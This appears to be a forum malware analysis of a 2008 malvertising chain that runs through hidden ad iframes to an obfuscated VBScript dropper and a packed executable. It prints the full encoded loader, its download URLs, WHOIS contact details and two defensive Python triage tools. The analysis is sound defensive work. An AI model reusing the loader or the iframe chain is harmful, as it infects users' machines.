ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-05-18
Expires: 2009-05-18
Updated: 2008-05-19
Name Server: NS0.DIRECTNIC.COM (has 354,782 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Address: 194.126.193.160
IP Location - Noord-holland - Amsterdam - Easycarrier-ipv
Dedicated Hosting: 247mediadirect.com is hosted on a dedicated server.

Registrant:
Media Hosting Ltd.
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Domain Name: 247MEDIADIRECT.COM

Administrative Contact:
Pearson, Ross rpearson79@yahoo.com
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Technical Contact:
Pearson, Ross rpearson79@yahoo.com
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Record expires on 05-19-2009
Record created on 05-19-2008

Domain servers in listed order:
NS0.DIRECTNIC.COM 69.46.233.245
NS1.DIRECTNIC.COM 69.46.234.245

<h4>
Network traces
</h4>
CODE
GET http://ads.adbrite.com/adserver/display_iab_ads.php?sid=628866&title_color=0000FF&text_color=000000&background_color=FFFFFF&border_color=CCCCCC&url_color=008000&
newwin=&zs=&width=468&height=60&
url=http%3A%2F%2Fwww.axill.com%2Fcpm%2FCpm.aspx%3Faffid%3D31637%26W%3D468 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad2.adecn.com/here.spot?v=2.2;time=617;spotId=7094;c=0;ms=1214666468209
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ads.adbrite.com
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://www.adbrite.com/p3p.xml",CP="NOI NID"
Set-Cookie: b=4190%3A%3Adh8i%2C3ygf%2C4190; expires=Sun, 28-Jun-2009 15:21:24 GMT; path=/; domain=.adbrite.com
Content-type: text/html
Date: Sat, 28 Jun 2008 15:21:24 GMT
Server: lighttpd/1.4.19

165
<html> <head> </head> <body leftmargin=0 topmargin=0 bgcolor="#FFFFFF"> <!-- BEGIN STANDARD TAG - 468 x 60 - ROS: Run-of-site - DO NOT MODIFY -->
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=468 HEIGHT=60 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60§ion=321066"></IFRAME>
<!-- END TAG --> </body> </html>
0

The page below contains our next location, being 247mediadirect.com/media/1/9550/468x60

CODE
GET http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60§ion=321066 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.adbrite.com/adserver/display_iab_ads.php?sid=628866&title_color=0000FF&text_color=000000&background_color=FFFFFF&border_color=CCCCCC&url_color=008000&
newwin=&zs=&width=468&height=60&
url=http%3A%2F%2Fwww.axill.com%2Fcpm%2FCpm.aspx%3Faffid%3D31637%26W%3D468
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ad.yieldmanager.com
Proxy-Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Sat, 28 Jun 2008 15:21:25 GMT
Server: Right Media Ad Server/405
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: fl_inst=; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=created=1214666436&lastCounted=1214666436&uid=c25febc6-4525-11dd-ae82-001e0b5a03f8&_hmacv=1&_salt=85413568&_keyid=k1&_hmac=2a5197aaa08d2d9c1aa26fb0820bc6ce0072fe77; expires=Mon, 28-Jul-2008 15:21:25 GMT
Set-Cookie: lifb=sP.YoIgkW70<%QS<We8e*McuM; expires=Sat, 05-Jul-2008 15:21:25 GMT
Set-Cookie: vuday1=oEKx`B[ApMNG's!Ywi5s; expires=Sun, 29-Jun-2008 00:00:00 GMT
Set-Cookie: fl_inst=1; expires=Thu, 25-Dec-2008 15:21:25 GMT
Set-Cookie: pv1="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: pc1="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: ih="b!!!!'!#[,7!!!!#:9osF!#[AA!!!!#:9osk!#]`b!!!!#:9osu!#^@.!!!!#:9osK"; path=/; expires=Mon, 28-Jun-2010 15:21:25 GMT
Set-Cookie: vh="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: ia="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Location: http://247mediadirect.com/media/1/9550/468x60
Cache-Control: no-store
Last-Modified: Sat, 28 Jun 2008 15:21:25 GMT
Pragma: no-cache
Content-Length: 0
Connection: close

From there on, we retrieve the banner to be displayed and an iframe pointing to 247mediadirect.com/jh/f.php?id=9550

CODE
GET http://247mediadirect.com/media/1/9550/468x60 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.adbrite.com/adserver/display_iab_ads.php?sid=628866&title_color=0000FF&text_color=000000&background_color=FFFFFF&border_color=CCCCCC&url_color=008000&
newwin=&zs=&width=468&height=60&
url=http%3A%2F%2Fwww.axill.com%2Fcpm%2FCpm.aspx%3Faffid%3D31637%26W%3D468
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Date: Sat, 28 Jun 2008 22:56:44 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
~~~~~~~~~~~~~~: ~~~
Content-Type: text/html

152

<HTML><BODY><A HREF="http://247mediadirect.com/action/1/9550/97" TARGET="_blank"><IMG SRC="http://247mediadirect.com/ad/images/468x60/40370.gif"></A><iframe src="http://247mediadirect.com/jh/f.php?id=9550"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML>

0

The banner.

CODE
GET http://247mediadirect.com/ad/images/468x60/40370.gif HTTP/1.1
Accept: */*
Referer: http://247mediadirect.com/media/1/9550/468x60
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive

247mediadirect.com/jh/f.php?id=9550 contains a VBS script to construct the next URL.

CODE
GET http://247mediadirect.com/jh/f.php?id=9550 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://247mediadirect.com/media/1/9550/468x60
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Date: Sat, 28 Jun 2008 22:56:46 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
~~~~~~~~~~~~~~: ~~~~
Content-Type: text/html

16C
<br />
<b>Warning</b>:  mysql_pconnect() [<a href='function.mysql-pconnect'>function.mysql-pconnect</a>]: Too many connections in <b>/www/htdocs/jh/f.php</b> on line <b>38</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /www/htdocs/jh/f.php:38) in <b>/www/htdocs/jh/f.php</b> on line <b>49</b><br />

185B

<script language="VBScript">
</script>

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

//-->
</script>

<script language="VBScript">
Dim s
str=""
s = Array(74,105,27,64,109,109,106,109,27,77,96,110,112,104,96,27,73,96,115,111,5,110,96,111,27,95,27,56,27,95,106,94,112,104,96,105,111,41,94,109,96,92,111,96,96,103,96,104,96,105,111,35,29,106,29,33,29,93,29,33,29,101,29,33,29,96,29,33,29,94,29,33,29,111,29,36,5,63,100,104,27,100,95,110,35,44,47,36,5,100,95,110,35,43,36,27,27,56,27,29,61,63,52,49,62,48,48,49,40,49,48,60,46,40,44,44,63,43,40,52,51,46,60,40,43,43,62,43,47,65,62,45,52,64,46,49,29,5,100,95,110,35,44,36,27,27,56,27,29,61,63,52,49,62,48,48,49,40,49,48,60,46,40,44,44,63,43,40,52,51,46,60,40,43,43,62,43,47,65,62,45,52,64,46,49,29,5,100,95,110,35,45,36,27,27,56,27,29,60,61,52,61,62,64,63,63,40,64,62,50,64,40,47,50,64,44,40,52,46,45,45,40,63,47,60,45,44,43,49,44,50,44,44,49,29,5,100,95,110,35,46,36,27,27,56,27,29,43,43,43,49,65,43,46,46,40,43,43,43,43,40,43,43,43,43,40,62,43,43,43,40,43,43,43,43,43,43,43,43,43,43,47,49,29,5,100,95,110,35,47,36,27,27,56,27,29,43,43,43,49,65,43,46,60,40,43,43,43,43,40,43,43,43,43,40,62,43,43,43,40,43,43,43,43,43,43,43,43,43,43,47,49,29,5,100,95,110,35,48,36,27,27,56,27,29,49,96,46,45,43,50,43,92,40,50,49,49,95,40,47,96,96,49,40,51,50,52,94,40,95,94,44,97,92,52,44,95,45,97,94,46,29,5,100,95,110,35,49,36,27,27,56,27,29,49,47,44,47,48,44,45,61,40,61,52,50,51,40,47,48,44,63,40,60,43,63,51,40,65,62,65,63,65,46,46,64,51,46,46,62,29,5,100,95,110,35,50,36,27,27,56,27,29,50,65,48,61,50,65,49,46,40,65,43,49,65,40,47,46,46,44,40,51,60,45,49,40,46,46,52,64,43,46,62,43,60,64,46,63,29,5,100,95,110,35,51,36,27,27,56,27,29,43,49,50,45,46,64,43,52,40,65,47,62,45,40,47,46,94,51,40,51,46,48,51,40,43,52,65,62,63,44,63,61,43,50,49,49,29,5,100,95,110,35,52,36,27,27,56,27,29,49,46,52,65,50,45,48,65,40,44,61,45,63,40,47,51,46,44,40,60,52,65,63,40,51,50,47,51,47,50,49,51,45,43,44,43,29,5,100,95,110,35,44,43,36,27,56,27,29,61,60,43,44,51,48,52,52,40,44,63,61,46,40,47,47,97,52,40,51,46,61,47,40,47,49,44,47,48,47,62,51,47,61,65,51,29,5,100,95,110,35,44,44,36,27,56,27,29,63,43,62,43,50,63,48,49,40,50,62,
49,52,40,47,46,65,44,40,61,47,60,43,40,45,48,65,48,60,44,44,65,60,61,44,52,29,5,100,95,110,35,44,45,36,27,56,27,29,64,51,62,62,62,63,63,65,40,62,60,45,51,40,47,52,49,93,40,61,43,48,43,40,49,62,43,50,62,52,49,45,47,50,49,61,29,5,97,106,109,27,100,27,56,27,43,27,111,106,27,44,46,5,27,27,27,27,27,27,27,27,95,41,110,96,111,92,111,111,109,100,93,112,111,96,27,29,94,29,33,29,103,29,33,29,92,29,33,29,110,29,33,29,110,29,33,29,100,29,33,29,95,29,39,27,29,94,29,33,29,103,29,33,29,110,29,33,29,100,29,33,29,95,29,33,29,53,29,33,100,95,110,35,100,36,5,27,27,27,27,27,27,27,27,110,96,111,27,92,27,56,27,95,41,94,109,96,92,111,96,106,93,101,96,94,111,35,29,72,29,33,29,100,29,33,29,94,29,33,29,109,29,33,29,106,29,33,29,110,29,33,29,106,29,33,29,97,29,33,29,111,29,33,29,41,29,33,29,83,29,33,29,72,29,33,29,71,29,33,29,67,29,33,29,79,29,33,29,79,29,33,29,75,29,39,29,29,36,5,27,27,27,27,27,27,27,27,100,97,27,96,109,109,41,105,112,104,93,96,109,27,27,56,27,43,27,111,99,96,105,5,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,27,96,115,100,111,27,97,106,109,5,27,27,27,27,27,27,27,27,96,105,95,27,100,97,5,105,96,115,111,5,110,96,111,27,96,27,56,27,95,41,94,109,96,92,111,96,106,93,101,96,94,111,35,29,78,29,33,29,94,29,33,29,109,29,33,29,100,29,33,29,107,29,33,29,111,29,33,29,100,29,33,29,105,29,33,29,98,29,33,29,41,29,33,29,65,29,33,29,100,29,33,29,103,29,33,29,96,29,33,29,78,29,33,29,116,29,33,29,110,29,33,29,111,29,33,29,96,29,33,29,104,29,33,29,74,29,33,29,93,29,33,29,101,29,33,29,96,29,33,29,94,29,33,29,111,29,39,29,29,36,5,110,96,111,27,98,27,56,27,95,41,94,109,96,92,111,96,106,93,101,96,94,111,35,29,60,29,33,29,95,29,33,29,106,29,33,29,95,29,33,29,93,29,33,29,41,29,33,29,78,29,33,29,111,29,33,29,109,29,33,29,96,29,33,29,92,29,33,29,104,29,39,29,29,36,5,97,106,109,27,100,27,56,27,43,27,111,106,27,48,5,27,27,27,100,97,27,100,27,56,27,43,27,111,99,96,105,27,115,27,56,27,29,94,53,87,114,100,105,95,106,114,110,87,111,96,104,107,29,27,96,103,110,96,27,100,97,27,100,27,56,27,44,27,111,99,96,105
,27,115,27,56,27,29,94,53,87,111,96,104,107,29,27,96,103,110,96,27,100,97,27,100,27,56,27,45,27,111,99,96,105,27,115,27,56,27,29,94,53,87,111,104,107,29,27,96,103,110,96,27,100,97,27,100,27,56,27,46,27,111,99,96,105,27,115,27,56,27,29,94,53,87,114,100,105,105,111,87,111,96,104,107,29,27,96,103,110,96,27,100,97,27,100,27,56,27,47,27,111,99,96,105,27,115,27,56,27,29,94,53,87,29,27,96,105,95,27,100,97,5,27,27,27,99,27,56,27,96,41,93,112,100,103,95,107,92,111,99,35,115,39,29,87,101,97,100,95,106,101,41,96,115,96,29,36,5,27,27,27,98,41,111,116,107,96,27,56,27,44,5,27,27,27,92,41,106,107,96,105,27,29,66,29,33,29,64,29,33,29,79,29,39,27,29,99,111,111,107,53,42,42,45,47,50,104,96,95,100,92,95,100,109,96,94,111,41,94,106,104,42,93,93,93,41,107,99,107,42,44,45,44,47,49,52,46,51,43,49,42,48,95,97,93,48,44,92,49,50,97,49,45,51,48,47,50,50,43,95,51,92,49,52,96,45,96,43,94,95,50,44,94,41,96,115,96,58,92,97,97,100,95,56,52,48,48,43,29,39,27,43,5,27,27,27,92,41,110,96,105,95,5,27,27,27,98,41,106,107,96,105,5,27,27,27,98,41,114,109,100,111,96,27,92,41,109,96,110,107,106,105,110,96,93,106,95,116,5,27,27,27,98,41,110,92,113,96,111,106,97,100,103,96,27,99,39,45,5,27,27,27,98,41,94,103,106,110,96,5,27,27,27,100,97,27,96,109,109,41,105,112,104,93,96,109,27,55,57,27,43,27,111,99,96,105,5,27,27,27,27,27,27,27,27,64,109,109,41,62,103,96,92,109,5,27,27,27,96,103,110,96,5,27,27,27,27,27,27,27,27,110,96,111,27,100,27,56,27,95,41,94,109,96,92,111,96,106,93,101,96,94,111,35,29,110,29,33,29,99,29,33,29,96,29,33,29,103,29,33,29,103,29,33,29,41,29,33,29,92,29,33,29,107,29,33,29,107,29,33,29,103,29,33,29,100,29,33,29,94,29,33,29,92,29,33,29,111,29,33,29,100,29,33,29,106,29,33,29,105,29,39,29,29,36,5,27,27,27,27,27,27,27,27,100,41,110,99,96,103,103,96,115,96,94,112,111,96,27,99,39,29,29,39,29,29,39,29,106,29,33,29,107,29,33,29,96,29,33,29,105,29,39,43,5,27,27,27,27,27,27,27,27,96,115,100,111,27,97,106,109,5,27,27,27,64,105,95,27,100,97,5,105,96,115,111)
For i = 0 to UBound(s)
    str = str & chr(s(i) + 5)
Next
Execute(str)
</script>
0

Execute(str) leads us to the next location where we start to download jfidoj.exe.

CODE
GET http://247mediadirect.com/bbb.php/1214693806/5dfb51a67f62854770d8a69e2e0cd71c.exe?affid=9550 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 28 Jun 2008 22:56:48 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
Content-Length: 29760
Content-Type: application/octet-stream

MZÿÿ¸@غ´    Í!¸LÍ!This program cannot be run in DOS mode.

$ôÌ°gsŸ°gsŸ°gsŸË{Ÿ±gsŸ°grŸˆgsŸÒx`ŸµgsŸ†AxŸµgsŸ3{}Ÿ±gsŸ†AyŸ¿gsŸwauŸ±gsŸRich°gsŸPELê7THà pPpË`Ð@à`ÐðÐ`UPX0P€àUPX1p`n@à.rsrcÐr@À3.10UPX!
    §¥ÉF†Ôñ ¥ài†&§344ðÎßÐÑ_ŸðݤÃY0Þ×ÒðÎZáö?ú• Ã!a/àfdøz²÷¤6:¤­¯qØí     ¶þ1ÊS6Ə 9J-

Note: some of the GET URLs have been broken into 3 lines for visibility reasons.

<h4>
Notes
</h4>
Launches itself with the command line parameter 1
For changes and behavior please see Technical details & Notes in post #1. This version of jfidoj.exe creates 2 additional files.

QUOTE
c:\WINDOWS\system32\42g1275i.exe.a_a
Date: 6/28/2008 6:08 PM
Size: 0 bytes

c:\Documents and Settings\KLY\Local Settings\Temp\1Ll5OSVH.hdi
date: 6/28/2008 6:09 PM
size: 0 bytes
Kimberly
<h4>
jfidoj.exe - 21centmedia.com - 209.47.164.209
</h4>
247mediadirect.com has a lil' friend I did encounter today ...

21centmedia.com - 209.47.164.209.

Website Title: None given.
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-05-29
Expires: 2009-05-29
Updated: 2008-05-29
Name Server: NS0.DIRECTNIC.COM (has 354,650 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Address: 209.47.164.209
IP Location - United States - Mci Communications Services Inc. D/b/a Verizon Business
Dedicated Hosting: 21centmedia.com is hosted on a dedicated server.

Registrant:
Media Hosting Ltd.
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Domain Name: 21CENTMEDIA.COM

Administrative Contact:
Pearson, Ross
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Technical Contact:
Pearson, Ross
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Record expires on 05-29-2009
Record created on 05-29-2008

Domain servers in listed order:
NS0.DIRECTNIC.COM 69.46.233.245
NS1.DIRECTNIC.COM 69.46.234.245

<h4>
Network traces
</h4>
CODE
GET /campaign/1/1/468x60 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.yieldmanager.com/iframe3?[removed]
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 21centmedia.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Wed, 16 Jul 2008 01:15:14 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 534
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<HTML><BODY><A HREF="http://21centmedia.com/route/1/5919/117" TARGET="_blank"><IMG SRC="http://21centmedia.com/banner/images/468x60/84489.jpg"></A><iframe src="http://21centmedia.com/xo/a.php?id=5919"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML><iframe src="http://209.47.164.209/z?i=1&n=4f6e8320e1ae5ca898cca282b69215e5&t=1216170914"  frameborder=0
marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe>

The banner.

CODE
GET /banner/images/468x60/84489.jpg HTTP/1.1
Accept: */*
Referer: http://21centmedia.com/campaign/1/1/468x60
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 21centmedia.com
Connection: Keep-Alive

21centmedia.com/xo/a.php?id=5919 contains a VBS script to construct the next URL.

CODE
GET /xo/a.php?id=5919 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://21centmedia.com/campaign/1/1/468x60
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 21centmedia.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Wed, 16 Jul 2008 01:15:15 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Set-Cookie: A00=1; expires=Thu, 17-Jul-2008 01:15:15 GMT
Content-Length: 6067
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<script language="VBScript">
Dim s
str=""
s =
...
... REMOVED AS IT IS THE SAME STYLE AS ABOVE
...

For i = 0 to UBound(s)
    str = str & chr(s(i) + 5)
Next
Execute(str)
</script>
0

Execute(str) leads us to the next location where we start to download jfidoj.exe.

CODE
GET /ot/a.php/1216170915/4693b5662c346f9d5eb959e1fda521b3.exe?affid=5919 HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 21centmedia.com
Connection: Keep-Alive


209.47.164.209/z?i=1&n=4f6e8320e1ae5ca898cca282b69215e5&t=1216170914 leads to an encoded script with a SWF file to download. More about that here because it's a Flash exploit.
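Added example, not part of Kimberly's posts: both a.php captures above (the 247mediadirect.com one and the 21centmedia.com one) hide the real script as an integer array that the loader rebuilds with `chr(s(i) + 5)` and then hands to `Execute`. An analyst never needs to run that loader; the same transform can be applied offline. The decoder below parses the `s = Array(...)` literal, reads the offset from the `chr(s(i) + N)` loop, and, as a generalization beyond this sample, guesses the offset from VBScript keywords when the loop is not visible (e.g. split across responses). The sample script it builds is constructed here from benign VBScript; the function and variable names are mine, not the loader's.

```python
import re

# VBScript tokens a correctly decoded payload is likely to contain. A wrong offset
# shifts every character, so none of these survive it (constructed marker list).
VBS_MARKERS = ("set ", "createobject", "then", "end if", "next", "execute", "dim ", "function")


def parse_vbs_array(script_text):
    """Return the integers of the first 's = Array(...)' literal in the script.
    The literal may span many lines, as it does in the captured a.php response."""
    m = re.search(r"Array\s*\(([\d\s,]+)\)", script_text, re.IGNORECASE)
    if not m:
        raise ValueError("no Array(...) literal found")
    return [int(tok) for tok in m.group(1).split(",") if tok.strip()]


def extract_offset(script_text):
    """Read the constant N straight from the 'chr(s(i) + N)' loop, if it is visible."""
    m = re.search(r"chr\s*\(\s*s\s*\(\s*i\s*\)\s*([+-])\s*(\d+)\s*\)", script_text, re.IGNORECASE)
    if not m:
        return None
    sign, n = m.groups()
    return int(n) if sign == "+" else -int(n)


def decode(values, offset):
    """Apply the loader's transform (chr(value + offset)) without ever calling Execute."""
    return "".join(chr(v + offset) for v in values)


def score(text):
    """Count VBScript markers in a candidate plaintext."""
    t = text.lower()
    return sum(t.count(k) for k in VBS_MARKERS)


def guess_offset(values, candidates=range(-64, 65)):
    """Recover the offset when the decoding loop is missing or rewritten.
    Returns None if no candidate yields VBScript-looking text."""
    best_off, best_score = None, 0
    for off in sorted(candidates, key=abs):  # prefer small shifts on ties
        if any(not 0 <= v + off < 128 for v in values):
            continue  # would leave 7-bit ASCII; not what this loader produces
        s = score(decode(values, off))
        if s > best_score:
            best_off, best_score = off, s
    return best_off


def decode_script(script_text):
    """Full static pipeline: array literal -> offset (read, else guessed) -> plaintext."""
    values = parse_vbs_array(script_text)
    offset = extract_offset(script_text)
    if offset is None:
        offset = guess_offset(values)
    if offset is None:
        raise ValueError("could not determine decoding offset")
    return decode(values, offset)


# Constructed, benign plaintext used to build a sample in the captured page's style.
BENIGN_PLAINTEXT = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'If fso.FolderExists("C:\\Temp") Then\n'
    '    MsgBox "demo"\n'
    'End If\n'
)


def build_sample_script(plaintext, offset):
    """Encode plaintext the way the captured loader expects (ord(c) - offset)."""
    values = ",".join(str(ord(c) - offset) for c in plaintext)
    return (
        '<script language="VBScript">\n'
        'Dim s\nstr=""\n'
        f's = Array({values})\n'
        'For i = 0 to UBound(s)\n'
        f'    str = str & chr(s(i) + {offset})\n'
        'Next\nExecute(str)\n</script>\n'
    )


if __name__ == "__main__":
    sample = build_sample_script(BENIGN_PLAINTEXT, 5)
    print(decode_script(sample))
```

To use it on a real capture, feed the whole HTTP response body (script tag included) to `decode_script`; the regex tolerates the array literal being spread over many lines. The marker scoring in `guess_offset` is deliberately crude: it only has to separate the one correct shift from shifts that turn every keyword into gibberish.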
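Added example, not from the thread: the 468x60 campaign response captured above carries the banner plus two 1x1 iframes, one to a.php on the ad host and one to the bare IP 209.47.164.209, which is the whole hand-off from advert to dropper. The triage below, which is my code and not anything the ad network shipped, pulls every iframe out of an ad response and flags the ones that are hidden (1x1), point at an IP-literal host, or point off the ad host. The sample HTML is constructed in the same shape as the capture, with documentation hosts (`ads.example.net`, `192.0.2.10`) standing in for the real ones.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attribute dicts of every <iframe> in a response body.
    HTMLParser keeps going after </HTML>, which matters: the second iframe in the
    capture sits outside the document's closing tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dim(attrs, name):
    """Parse width/height whether quoted or bare; None if absent or non-numeric."""
    try:
        return int(attrs.get(name, "").strip("\"'"))
    except ValueError:
        return None


def is_hidden(attrs):
    w, h = _dim(attrs, "width"), _dim(attrs, "height")
    return w is not None and h is not None and w <= 1 and h <= 1


def host_is_ip(url):
    """True when the URL's host is an IP literal rather than a name."""
    host = urlparse(url).hostname or ""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def triage_ad_response(html, ad_host):
    """Return [(src, [reasons...])] for each iframe worth a closer look."""
    p = IframeCollector()
    p.feed(html)
    findings = []
    for f in p.iframes:
        src = f.get("src", "")
        host = urlparse(src).hostname or ""
        reasons = []
        if is_hidden(f):
            reasons.append("1x1 hidden iframe")
        if host_is_ip(src):
            reasons.append("src host is a bare IP")
        if host and host != ad_host:
            reasons.append("third-party host")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample modelled on the captured /campaign/1/1/468x60 body.
SAMPLE_AD_RESPONSE = (
    '<HTML><BODY><A HREF="http://ads.example.net/route/1/1/1" TARGET="_blank">'
    '<IMG SRC="http://ads.example.net/banner/images/468x60/1.jpg"></A>'
    '<iframe src="http://ads.example.net/xo/a.php?id=1" frameborder=0 '
    'scrolling="no" width=1 height=1></iframe></BODY></HTML>'
    '<iframe src="http://192.0.2.10/z?i=1&n=deadbeef&t=1" frameborder=0 '
    'scrolling="no" width=1 height=1></iframe>'
)


if __name__ == "__main__":
    for src, reasons in triage_ad_response(SAMPLE_AD_RESPONSE, "ads.example.net"):
        print(src, "->", ", ".join(reasons))
```

Run this over proxied ad responses and the a.php iframe surfaces as hidden-on-same-host, while the raw-IP iframe trips all three checks; a banner that genuinely needs a 1x1 tracking pixel would normally load it as an image, not an iframe, so the hidden-iframe reason alone is worth logging.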
Invision Power Board © 2001-2014 Invision Power Services, Inc.